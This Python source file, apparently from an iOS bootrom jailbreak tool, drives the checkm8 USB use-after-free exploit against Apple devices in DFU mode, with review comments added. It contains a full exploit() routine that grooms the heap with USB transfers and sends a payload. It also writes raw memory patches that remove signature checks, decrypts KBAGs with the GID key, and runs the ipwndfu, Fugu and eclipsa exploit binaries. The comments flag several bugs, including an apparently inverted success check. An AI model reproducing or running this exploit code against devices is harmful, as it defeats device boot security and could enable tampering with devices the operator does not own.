def pwndfumode_TEST():
    """Alternate pwned-DFU entry helper (the name suggests a test variant).

    Reads the DFU serial, runs the bundled ipwndfu binary with ``-p`` and,
    depending on its exit status, either calls removesig() from the ipwndfu
    resource directory or prints a failure message and exits with status 99.
    """
    # os.chdir("resources/ipwndfu")
    device = dfu.acquire_device()
    serial_number = device.serial_number  # read but not used in this variant
    dfu.release_device(device)
    # CPID:8960' in serial_number:  # my1
    # runexploit = checkm8.exploit()
    cmd = 'ipwndfu_geohot/ipwndfu -p'
    # shell=True is used with a fixed literal: no caller-controlled text reaches
    # the shell here. The binary path is resolved relative to the current
    # working directory, so the chdir above being commented out matters.
    so = subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL)
    runexploit = so.returncode
    # NOTE(review): subprocess.run reports 0 for a successful exit, so this
    # branch prints "worked" on a NON-zero status. Confirm the binary's exit
    # convention; if it follows the usual one, the check should be `== 0`.
    if runexploit:
        print("Exploit worked!")
        os.chdir("../resources/ipwndfu")
        removesig()
    else:
        print('\033[91m' + "Exploit failed =(" + '\033[0m')
        exit(99)
def xsigpatch():
    """Write a prepared patch into an already-pwned DFU device over usbexec.

    Reads the DFU serial, then through usbexec.PwnedUSBDevice writes four
    packed blocks of eight little-endian u64 values at HEAP_BASE +
    HEAP_WRITE_OFFSET (0x80 apart), runs HEAP_WRITE_HASH on each and
    HEAP_CHECK_ALL once, and finally writes ``bin/0x8015.bin`` to
    TRAMPOLINE + 0x400 and executes it. Every address below is hard-coded;
    the payload file name suggests a single CPID (0x8015) but nothing in this
    function checks that the attached device is that SoC.
    """
    device = dfu.acquire_device()
    # NOTE(review): the serial is read but never compared against the CPID the
    # hard-coded addresses were chosen for; a mismatched device gets raw
    # writes at these addresses with no guard.
    serial_number = device.serial_number
    dfu.release_device(device)
    device = usbexec.PwnedUSBDevice()  # overwritten by the second construction below
    HEAP_BASE = 0x1801E8000
    HEAP_WRITE_OFFSET = 0x5000
    HEAP_WRITE_HASH = 0x10000D4EC
    HEAP_CHECK_ALL = 0x10000DB98
    HEAP_STATE = 0x1800086A0
    # The five constants below are defined but not used in this function.
    NAND_BOOT_JUMP = 0x10000188C
    BOOTSTRAP_TASK_LR = 0x180015F88
    DFU_BOOL = 0x1800085B0
    DFU_NOTIFY = 0x1000098B4
    DFU_STATE = 0x1800085E0
    TRAMPOLINE = 0x180018000
    # Two 64-byte blocks: '<8Q' packs eight u64 little-endian; they differ only
    # in the sixth value (132 vs 8).
    block1 = struct.pack('<8Q', 0, 0, 0, HEAP_STATE, 2, 132, 128, 0)
    block2 = struct.pack('<8Q', 0, 0, 0, HEAP_STATE, 2, 8, 128, 0)
    device = usbexec.PwnedUSBDevice()
    device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET, block1)
    device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET + 0x80, block2)
    device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET + 0x100, block2)
    device.write_memory(HEAP_BASE + HEAP_WRITE_OFFSET + 0x180, block2)
    device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET)
    device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET + 0x80)
    device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET + 0x100)
    device.execute(0, HEAP_WRITE_HASH, HEAP_BASE + HEAP_WRITE_OFFSET + 0x180)
    device.execute(0, HEAP_CHECK_ALL)
    print('Heap repaired.')
    # NOTE(review): open() here is text mode (returns str, not bytes) and the
    # handle is never closed; `with open('bin/0x8015.bin', 'rb') as f:` looks
    # intended -- confirm what usbexec.write_memory accepts. The file is also
    # loaded with no integrity check; it is trusted as-is from the resource dir.
    device.write_memory(TRAMPOLINE + 0x400, open('bin/0x8015.bin').read())
    device.execute(0, 0x180018400)  # == TRAMPOLINE + 0x400, the address just written
    print('Bootrom Patched')
def __init__(self):
    """Bind to the attached DFU device and select its platform and config.

    The platform is chosen by the ``CPID:xxxx CPRV:xx `` prefix of the DFU
    serial; the config by matching 0x100 bytes read at image_base() + 0x200.
    Either lookup failing prints a diagnostic and exits with status 1.
    """
    self.config = None
    self.platform = None

    handle = dfu.acquire_device()
    self.serial_number = handle.serial_number
    dfu.release_device(handle)

    # First platform whose CPID/CPRV prefix matches the serial, else None.
    self.platform = next(
        (dp for dp in device_platform.all_platforms
         if self.serial_number.startswith('CPID:%04x CPRV:%02x ' % (dp.cpid, dp.cprv))),
        None,
    )
    if self.platform is None:
        print(self.serial_number)
        print('ERROR: No matching usbexec.platform found for this device.')
        sys.exit(1)

    # First config that recognises the bytes read from the image, else None.
    info = self.read_memory(self.image_base() + 0x200, 0x100)
    self.config = next((cfg for cfg in configs if cfg.match(info)), None)
    if self.config is None:
        print(info)
        print('ERROR: No matching usbexec.config found for this image.')
        sys.exit(1)
def pwndfumode():
    """Change into the bundled ipwndfu directory, touch the DFU device, run removesig().

    The working directory is left at resources/ipwndfu for the caller.
    """
    os.chdir("resources/ipwndfu")
    handle = dfu.acquire_device()
    # Read for parity with the other entry points; not used in this variant.
    serial_number = handle.serial_number
    dfu.release_device(handle)
    removesig()
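def getecid():
    """Return the ECID parsed from the DFU serial string, or None.

    The serial is expected to contain an ``ECID:<value> IBFL`` fragment; the
    text between those two markers is returned unchanged. When the fragment is
    absent an error is printed and None is returned, as before.

    Returns:
        str | None: the ECID text, or None when it is not in the serial.
    """
    device = dfu.acquire_device()
    serial = device.serial_number
    # Release the handle like every other entry point in this file does; the
    # original left it acquired, which may interfere with the next acquire.
    dfu.release_device(device)
    match = re.search(r'ECID:(.+?) IBFL', serial)
    if match is None:
        print('\033[91m' + "ERROR: Couldn't find ECID in serial" + '\033[0m')
        return None
    return match.group(1)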
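def decryptKBAG(kbag: str):
    """Decrypt a KBAG with the device GID key via the bundled ipwndfu binary.

    The ipwndfu build is chosen by the CPID in the DFU serial (two groups, as
    in the original chain). The binary is run with ``--decrypt-gid=<kbag>``;
    its output has the "Decrypting with ... GID key." banner removed and the
    first and last characters stripped, exactly as before.

    Args:
        kbag: the KBAG string handed to ipwndfu. It is passed as one argv
            element and never interpreted by a shell.

    Returns:
        str: the processed ipwndfu output (iv/key text).

    Exits with status 0 when the CPID is not in either supported group.
    """
    import subprocess

    device = dfu.acquire_device()
    serial_number = device.serial_number
    dfu.release_device(device)

    if any(cpid in serial_number for cpid in ("CPID:8960", "CPID:8965", "CPID:8010", "CPID:8015")):
        tool = 'resources/ipwndfuX/ipwndfu'
    elif any(cpid in serial_number for cpid in ("CPID:8000", "CPID:8003", "CPID:7000", "CPID:7001")):
        tool = 'resources/ipwndfuKeys/ipwndfu'
    else:
        print("Not supported...")
        exit(0)

    # argv list instead of os.popen(f'... --decrypt-gid={kbag}'): the caller
    # supplied kbag reached a shell in the original, so metacharacters in it
    # could run arbitrary commands. stdout is captured as text like os.popen
    # did; stderr still goes to the terminal.
    result = subprocess.run([tool, f'--decrypt-gid={kbag}'],
                            stdout=subprocess.PIPE, universal_newlines=True)
    ivkey = result.stdout
    ivkey = re.sub(r'Decrypting with \w+ GID key\.', '', ivkey)
    ivkey = ivkey[1:-1]
    return ivkey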
def pwndfumode():
    """Run checkm8 on an A7 (CPID 8960/8965) DFU device from resources/ipwndfu.

    On success removesig() is called; on failure the process exits with 99.
    A CPID 8950 device exits with 2 and a hint to use normal mode; any other
    CPID exits with 1 as unsupported.
    """
    os.chdir("resources/ipwndfu")
    handle = dfu.acquire_device()
    serial_number = handle.serial_number
    dfu.release_device(handle)

    if 'CPID:8960' in serial_number or 'CPID:8965' in serial_number:
        # Both A7 variants take the same path; the original spelled it out twice.
        if not checkm8.exploit():
            print('\033[91m' + "Exploit failed =(" + '\033[0m')
            exit(99)
        print("Exploit worked!")
        removesig()
        return

    if 'CPID:8950' in serial_number:
        print("iPhone 5 found!")
        os.chdir("..")
        print('\033[91m' + "You need to have your 32 Bit device in normal mode, not DFU. Restart it and try again" + '\033[0m')
        exit(2)

    print('Found:', serial_number)
    print('\033[91m' + 'ERROR: This device is not supported.' + '\033[0m')
    exit(1)
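def command(self, request_data, response_length):
    """Send one usbexec request to the pwned device and return its response.

    Args:
        request_data: bytes handed to dfu.send_data after a 16-byte zero prefix.
        response_length: expected response size, 0..USB_READ_LIMIT inclusive.

    Returns:
        bytes: exactly ``response_length`` bytes read back by control transfer.

    Raises:
        AssertionError: on an out-of-range length, when the re-acquired handle
            is not the device this object was bound to, or on a response of
            the wrong size (same exception type as before).
    """
    assert 0 <= response_length <= USB_READ_LIMIT
    device = dfu.acquire_device()
    # Refuse to talk to a different device than the one we were bound to.
    assert self.serial_number == device.serial_number
    try:
        dfu.send_data(device, b'\0' * 16)
        device.ctrl_transfer(0x21, 1, 0, 0, 0, 100)
        device.ctrl_transfer(0xA1, 3, 0, 0, 6, 100)
        device.ctrl_transfer(0xA1, 3, 0, 0, 6, 100)
        dfu.send_data(device, request_data)
        # HACK: a zero-length read is requested as one byte and that byte is
        # dropped, so the caller still receives an empty response.
        # array.tostring() was removed in Python 3.9; tobytes() yields the same
        # bytes on every version this file can run on (it uses f-strings).
        if response_length == 0:
            response = device.ctrl_transfer(0xA1, 2, 0xFFFF, 0, response_length + 1, CMD_TIMEOUT).tobytes()[1:]
        else:
            response = device.ctrl_transfer(0xA1, 2, 0xFFFF, 0, response_length, CMD_TIMEOUT).tobytes()
    finally:
        # Release even when a transfer raises; the original skipped this on error.
        dfu.release_device(device)
    assert len(response) == response_length
    return response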
def pwndfumodeKeys():
    """Put the attached DFU device into pwned DFU mode for the key-dump flow.

    Dispatches on the CPID in the DFU serial: A7 (8960/8965) calls
    checkm8.exploit() from resources/ipwndfu; 8010, 8015 and the
    8000/8003/7000/7001 group run a per-CPID ipwndfu binary with ``-p`` and
    then re-read the serial to look for ``PWND:[checkm8]``. On a "no device"
    result the user is asked to re-enter DFU and the function calls itself.
    Every command run here is a fixed literal, but each binary is resolved
    relative to the current working directory, which this function changes
    and (on most paths) restores with os.chdir("../..").
    """
    device = dfu.acquire_device()
    serial_number = device.serial_number
    dfu.release_device(device)
    if "CPID:8960" in serial_number:
        # The exists() guard skips the chdir when we are already inside
        # resources/ipwndfu, e.g. on the recursive retry below.
        if not os.path.exists("checkm8.py"):
            os.chdir("resources/ipwndfu")
        runexploit = checkm8.exploit()
        if runexploit:
            os.chdir("../..")
        else:
            print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
            input()
            # NOTE(review): recursion with no retry limit; the cwd is still
            # resources/ipwndfu here, so the retry relies on the guard above.
            pwndfumodeKeys()
    elif "CPID:8965" in serial_number:
        if not os.path.exists("checkm8.py"):
            os.chdir("resources/ipwndfu")
        runexploit = checkm8.exploit()
        if runexploit:
            print("Exploit worked!")
            os.chdir("../..")
        else:
            print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
            input()
            pwndfumodeKeys()
    elif "CPID:8010" in serial_number:
        if "PWND:[checkm8]" in serial_number:
            print("Device already in PWNDFU mode, not re-running exploit..")
            return
        else:
            if not os.path.exists("checkm8.py"):
                os.chdir("resources/ipwndfu8010")
            cmd = './ipwndfu -p'
            so = os.popen(cmd).read()
            print(so)
            if "ERROR: No Apple device" in so:
                print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
                input()
                # NOTE(review): when the recursive call returns, execution
                # continues below and re-checks the device a second time.
                pwndfumodeKeys()
            time.sleep(5)
            device = dfu.acquire_device()
            serial_number = device.serial_number
            dfu.release_device(device)
            if "PWND:[checkm8]" in serial_number:
                print("Exploit worked!")
                os.chdir("../..")
                time.sleep(5)
                return
            # NOTE(review): no else branch -- a still-unpwned 8010 device falls
            # off the end silently, with the cwd left in resources/ipwndfu8010.
    elif "CPID:8015" in serial_number:
        if "PWND:[checkm8]" in serial_number:
            print("Device already in PWNDFU mode, not re-running exploit..")
            return
        else:
            if not os.path.exists("checkm8.py"):
                os.chdir("resources/ipwndfuX")
            cmd = './ipwndfu -p'
            so = os.popen(cmd).read()
            print(so)
            if "ERROR: No Apple device" in so:
                print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
                input()
                pwndfumodeKeys()
            os.chdir("../..")
            time.sleep(5)
            # Need to re-acquire the device before we check if checkm8 worked or it will always report as failed
            device = dfu.acquire_device()
            serial_number = device.serial_number
            dfu.release_device(device)
            if "PWND:[checkm8]" in serial_number:
                print("Exploit worked!")
                return
            else:
                print("Exploit failed...\nReboot and try again...")
                exit(2)
    elif "CPID:8000" in serial_number or "CPID:8003" in serial_number or "CPID:7000" in serial_number or "CPID:7001" in serial_number:
        if "PWND:[checkm8]" in serial_number:
            print("Device already in PWNDFU mode, not re-running exploit..")
            return
        else:
            if not os.path.exists("checkm8.py"):
                os.chdir("resources/ipwndfuKeys")
            cmd = './ipwndfu -p'
            so = os.popen(cmd).read()
            print(so)
            if "ERROR: No Apple device" in so:
                print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
                input()
                pwndfumodeKeys()
            os.chdir("../..")
            time.sleep(5)
            # Need to re-acquire the device before we check if checkm8 worked or it will always report as failed
            device = dfu.acquire_device()
            serial_number = device.serial_number
            dfu.release_device(device)
            if "PWND:[checkm8]" in serial_number:
                print("Exploit worked!")
                return
            else:
                print("Exploit failed...\nReboot and try again...")
                exit(2)
        return  # unreachable: both branches above return or exit
    else:
        print("Please open an issue and let me know what device you are using/it's CPID and I will add support ASAP")
        exit(2)
def pwndfumode():
    """Put the attached DFU device into pwned DFU mode (PyBoot entry point).

    Dispatches on the CPID in the DFU serial: 8960 runs resources/bin/pwnedDFU;
    8965 runs checkm8.exploit() plus rmsigchks.py under python2.7; 8010 fetches
    the Fugu v0.4 release on first use and runs ``Fugu rmsigchks``; 8015 runs
    ipwndfu ``-p`` then ``--patch``; 8000/8003/7000/7001 run an eclipsa binary
    whose result cannot be observed. Failure paths prompt the user and call
    this function again with no retry limit. All commands are fixed literals
    run through os.popen; binaries are resolved relative to the cwd, which this
    function changes and usually restores with os.chdir("../..").
    """
    device = dfu.acquire_device()
    serial_number = device.serial_number
    dfu.release_device(device)
    if "CPID:8960" in serial_number:
        # The exists() guard skips the chdir when already inside resources/bin.
        if not os.path.exists("pwnedDFU"):
            os.chdir("resources/bin")
        cmd = './pwnedDFU -p -f'
        so = os.popen(cmd).read()
        if "Device is now in pwned DFU mode!" in so:
            print("Exploit worked!")
            os.chdir("../..")
            return
        else:
            print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
            input()
            os.chdir("../..")
            pwndfumode()
    elif "CPID:8965" in serial_number:
        if not os.path.exists("checkm8.py"):
            os.chdir("resources/ipwndfu")
        runexploit = checkm8.exploit()
        if runexploit:
            print("Exploit worked!")
            cmd = 'python2.7 rmsigchks.py'
            so = os.popen(cmd).read()
            print(so)
            os.chdir("../..")
        else:
            print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
            input()
            # NOTE(review): unlike the 8960 branch, the cwd is not restored
            # before recursing; the retry relies on the exists() guard above.
            pwndfumode()
    elif "CPID:8010" in serial_number:
        # I don't want to bundle Fugu just to make sure that people know it hasnt been modified
        # I'd rather just quickly download the binary from Linus's github if it hasnt been already to avoid any issues
        if os.path.exists("resources/Fugu_8010/Fugu"):
            pass
        else:
            os.mkdir("resources/Fugu_8010")
            # The message says "latest" but the URL is pinned to v0.4.
            print("Downloading latest Fugu release from LinusHenze's github...")
            if os.path.exists("fugu.zip"):
                os.remove("fugu.zip")
            url = "https://github.com/LinusHenze/Fugu/releases/download/v0.4/Fugu_v0.4.zip"
            # NOTE(review): the archive is trusted on the strength of the HTTPS
            # connection alone -- no checksum or signature is verified before
            # the extracted binary is made executable and run against the
            # device. r.status_code is also never checked, so an error page
            # would be written to fugu.zip and fail at ZipFile below.
            r = requests.get(url, allow_redirects=True)
            open('fugu.zip', 'wb').write(r.content)  # handle is never closed explicitly
            if os.path.exists("fugu"):
                shutil.rmtree("fugu")
                os.mkdir("fugu")
            else:
                os.mkdir("fugu")
            shutil.move("fugu.zip", "fugu/fugu.zip")
            os.chdir("fugu")
            # NOTE(review): extractall() writes whatever member paths the archive
            # carries; it does not reject entries that escape the "fugu"
            # directory. Acceptable only while the archive source is trusted.
            with ZipFile('fugu.zip', 'r') as zipObj:
                zipObj.extractall()
            os.chdir("../")
            shutil.move("fugu/fugu", "resources/Fugu_8010/Fugu")
            shutil.move("fugu/shellcode", "resources/Fugu_8010/shellcode")
            st = os.stat('resources/Fugu_8010/Fugu')
            os.chmod('resources/Fugu_8010/Fugu', st.st_mode | stat.S_IEXEC)
            shutil.rmtree("fugu")
            print("Fugu has now been installed!")
        if "PWND:[checkm8]" in serial_number:
            print("Device already in PWNDFU mode, not re-running exploit..")
            return
        else:
            if not os.path.exists("Fugu"):
                os.chdir("resources/Fugu_8010")
            cmd = './Fugu rmsigchks'
            so = os.popen(cmd).read()
            #print(so)
            if "Exploiting iDevice: FAILED!" in so:
                # NOTE(review): unbounded recursion when every attempt fails;
                # the serial is not re-read first, so the PWND check at the top
                # of the recursive call sees the same stale value.
                print("Exploit failed, however re-expoilting without rebooting might work. Attempting now...")
                pwndfumode()
            if "Device could not be found!" in so:
                print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
                input()
                pwndfumode()
            time.sleep(5)
            device = dfu.acquire_device()
            serial_number = device.serial_number
            dfu.release_device(device)
            if "PWND:[checkm8]" in serial_number:
                print("Exploit worked!")
                os.chdir("../..")
                time.sleep(5)
                return
            # NOTE(review): no else branch -- an unpwned 8010 device falls off the
            # end silently with the cwd left in resources/Fugu_8010.
    elif "CPID:8015" in serial_number:
        if "PWND:[checkm8]" in serial_number:
            print("Device already in PWNDFU mode, not re-running exploit..")
            return
        else:
            if not os.path.exists("checkm8.py"):
                os.chdir("resources/ipwndfuX")
            cmd = './ipwndfu -p'
            so = os.popen(cmd).read()
            print(so)
            if "ERROR: No Apple device" in so:
                print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
                input()
                pwndfumode()
            cmd = './ipwndfu --patch'
            so = os.popen(cmd).read()
            print(so)
            os.chdir("../..")
            time.sleep(5)
            # Need to re-acquire the device before we check if checkm8 worked or it will always report as failed
            device = dfu.acquire_device()
            serial_number = device.serial_number
            dfu.release_device(device)
            if "PWND:[checkm8]" in serial_number:
                print("Exploit worked!")
                return
            else:
                print("Exploit failed...\nReboot and try again...")
                exit(2)
    elif "CPID:8000" in serial_number:
        cmd = './resources/bin/eclipsa8000'
        so = os.popen(cmd).read()
        print(so)
        print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot")
        return
    elif "CPID:8003" in serial_number:
        cmd = './resources/bin/eclipsa8003'
        so = os.popen(cmd).read()
        print(so)
        print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot")
        return
    elif "CPID:7000" in serial_number:
        cmd = './resources/bin/eclipsa7000'
        so = os.popen(cmd).read()
        print(so)
        print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot")
        return
    elif "CPID:7001" in serial_number:
        # NOTE(review): this branch runs the 8000 binary, not a 7001 one --
        # looks like a copy-paste; confirm that is intended.
        cmd = './resources/bin/eclipsa8000'
        so = os.popen(cmd).read()
        print(so)
        print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot")
        return
    else:
        print("Please open an issue and let me know what device you are using/it's CPID and I will add support ASAP")
        exit(2)
def pwndfumode():
    """Put the attached DFU device into pwned DFU mode (ipwndfu-based variant).

    Dispatches on the CPID in the DFU serial: 8960/8965 call checkm8.exploit()
    from resources/ipwndfu and then run rmsigchks.py under python2.7; 8010 and
    8015 run a per-CPID ipwndfu binary with ``-p`` (8015 also ``--patch``) and
    re-read the serial for ``PWND:[checkm8]``; 8000/8003/7000/7001 run an
    eclipsa binary whose result cannot be observed. Failure paths prompt the
    user and call this function again with no retry limit. All commands are
    fixed literals; binaries resolve relative to the cwd, which this function
    changes and usually restores with os.chdir("../..").
    """
    device = dfu.acquire_device()
    serial_number = device.serial_number
    dfu.release_device(device)
    if "CPID:8960" in serial_number:
        # The exists() guard skips the chdir when already inside resources/ipwndfu.
        if not os.path.exists("checkm8.py"):
            os.chdir("resources/ipwndfu")
        runexploit = checkm8.exploit()
        if runexploit:
            print("Exploit worked!")
            cmd = 'python2.7 rmsigchks.py'
            so = os.popen(cmd).read()
            print(so)
            os.chdir("../..")
        else:
            print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
            input()
            # NOTE(review): cwd is still resources/ipwndfu here; the retry relies
            # on the exists() guard above and there is no recursion limit.
            pwndfumode()
    elif "CPID:8965" in serial_number:
        if not os.path.exists("checkm8.py"):
            os.chdir("resources/ipwndfu")
        runexploit = checkm8.exploit()
        if runexploit:
            print("Exploit worked!")
            cmd = 'python2.7 rmsigchks.py'
            so = os.popen(cmd).read()
            print(so)
            os.chdir("../..")
        else:
            print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
            input()
            pwndfumode()
    elif "CPID:8010" in serial_number:
        if "PWND:[checkm8]" in serial_number:
            print("Device already in PWNDFU mode, not re-running exploit..")
            return
        else:
            if not os.path.exists("checkm8.py"):
                os.chdir("resources/ipwndfu8010")
            cmd = './ipwndfu -p'
            so = os.popen(cmd).read()
            print(so)
            if "ERROR: No Apple device" in so:
                print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
                input()
                pwndfumode()
            time.sleep(5)
            device = dfu.acquire_device()
            serial_number = device.serial_number
            dfu.release_device(device)
            if "PWND:[checkm8]" in serial_number:
                print("Exploit worked!")
                cmd = 'python2.7 rmsigchks.py'
                # NOTE(review): unlike the os.popen() calls above, this Popen is
                # never waited on or read -- `so` is the Popen object, so print(so)
                # shows its repr, not the script output, and the cwd is changed
                # while the child may still be running.
                so = subprocess.Popen(cmd, shell=True)
                print(so)
                os.chdir("../..")
                time.sleep(5)
                return
            # NOTE(review): no else branch -- an unpwned 8010 device falls off the
            # end silently with the cwd left in resources/ipwndfu8010.
    elif "CPID:8015" in serial_number:
        if "PWND:[checkm8]" in serial_number:
            print("Device already in PWNDFU mode, not re-running exploit..")
            return
        else:
            if not os.path.exists("checkm8.py"):
                os.chdir("resources/ipwndfuX")
            cmd = './ipwndfu -p'
            so = os.popen(cmd).read()
            print(so)
            if "ERROR: No Apple device" in so:
                print("Exploit failed, reboot device into DFU mode and press enter to re-run checkm8")
                input()
                pwndfumode()
            cmd = './ipwndfu --patch'
            so = os.popen(cmd).read()
            print(so)
            os.chdir("../..")
            time.sleep(5)
            # Need to re-acquire the device before we check if checkm8 worked or it will always report as failed
            device = dfu.acquire_device()
            serial_number = device.serial_number
            dfu.release_device(device)
            if "PWND:[checkm8]" in serial_number:
                print("Exploit worked!")
                return
            else:
                print("Exploit failed...\nReboot and try again...")
                exit(2)
    elif "CPID:8000" in serial_number:
        cmd = './resources/bin/eclipsa8000'
        so = os.popen(cmd).read()
        print(so)
        print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot")
        return
    elif "CPID:8003" in serial_number:
        cmd = './resources/bin/eclipsa8003'
        so = os.popen(cmd).read()
        print(so)
        print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot")
        return
    elif "CPID:7000" in serial_number:
        cmd = './resources/bin/eclipsa7000'
        so = os.popen(cmd).read()
        print(so)
        print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot")
        return
    elif "CPID:7001" in serial_number:
        # NOTE(review): this branch runs the 8000 binary, not a 7001 one --
        # looks like a copy-paste; confirm that is intended.
        cmd = './resources/bin/eclipsa8000'
        so = os.popen(cmd).read()
        print(so)
        print("Eclipsa doesn't allow me to see if the exploit worked or not =(\nJust have to assume it did, if it didn't then reboot into DFU mode and re-run PyBoot")
        return
    else:
        print("Please open an issue and let me know what device you are using/it's CPID and I will add support ASAP")
        exit(2)
def exploit():
    """Run the checkm8 sequence against the attached DFU device.

    Parameters come from exploit_config(serial); the device is reset and
    re-acquired between phases. Returns True when the device already reports
    ``PWND:[`` or when the serial reports ``PWND:[checkm8]`` afterwards;
    otherwise prints an error and calls sys.exit(1), so the function never
    returns False.
    """
    #print('*** checkm8 exploit by axi0mX ***')
    #print('*** modified version by Linus Henze ***')
    #print('*** s5l8965x support by Matthew Pierson ***')
    device = dfu.acquire_device()
    start = time.time()
    print('Found:', device.serial_number)
    if 'PWND:[' in device.serial_number:
        print('Device is already in pwned DFU Mode. Not executing exploit.')
        # NOTE(review): this early return skips dfu.release_device(device).
        return True
    payload, config = exploit_config(device.serial_number)
    if config.large_leak is not None:
        usb_req_stall(device)
        for i in range(config.large_leak):
            usb_req_leak(device)
        usb_req_no_leak(device)
    else:
        stall(device)
        for i in range(config.hole):
            no_leak(device)
        leak(device)
        no_leak(device)
    dfu.usb_reset(device)
    dfu.release_device(device)
    device = dfu.acquire_device()
    device.serial_number  # NOTE(review): bare attribute read; result unused
    libusb1_async_ctrl_transfer(device, 0x21, 1, 0, 0, b'A' * 0x800, 0.0001)
    # Advance buffer offset before triggering the UaF to prevent trashing the heap
    # NOTE(review): the line above passes bytes (b'A'), this one passes str
    # ('A'); confirm libusb1_no_error_ctrl_transfer accepts both.
    libusb1_no_error_ctrl_transfer(device, 0, 0, 0, 0, 'A' * config.overwrite_offset, 10)
    libusb1_no_error_ctrl_transfer(device, 0x21, 4, 0, 0, 0, 0)
    dfu.release_device(device)
    time.sleep(0.5)
    device = dfu.acquire_device()
    usb_req_stall(device)
    if config.large_leak is not None:
        usb_req_leak(device)
    else:
        for i in range(config.leak):
            usb_req_leak(device)
    libusb1_no_error_ctrl_transfer(device, 0, 0, 0, 0, config.overwrite, 50)
    # payload is sent in 0x800-byte slices.
    for i in range(0, len(payload), 0x800):
        libusb1_no_error_ctrl_transfer(device, 0x21, 1, 0, 0, payload[i:i + 0x800], 50)
    dfu.usb_reset(device)
    dfu.release_device(device)
    device = dfu.acquire_device()
    # Success is judged only by the re-read serial string.
    if 'PWND:[checkm8]' not in device.serial_number:
        print('ERROR: Exploit failed. Device did not enter pwned DFU Mode.')
        sys.exit(1)  # the handle is not released on this path either
    print('Device is now in pwned DFU Mode.')
    print('(%0.2f seconds)' % (time.time() - start))
    dfu.release_device(device)
    return True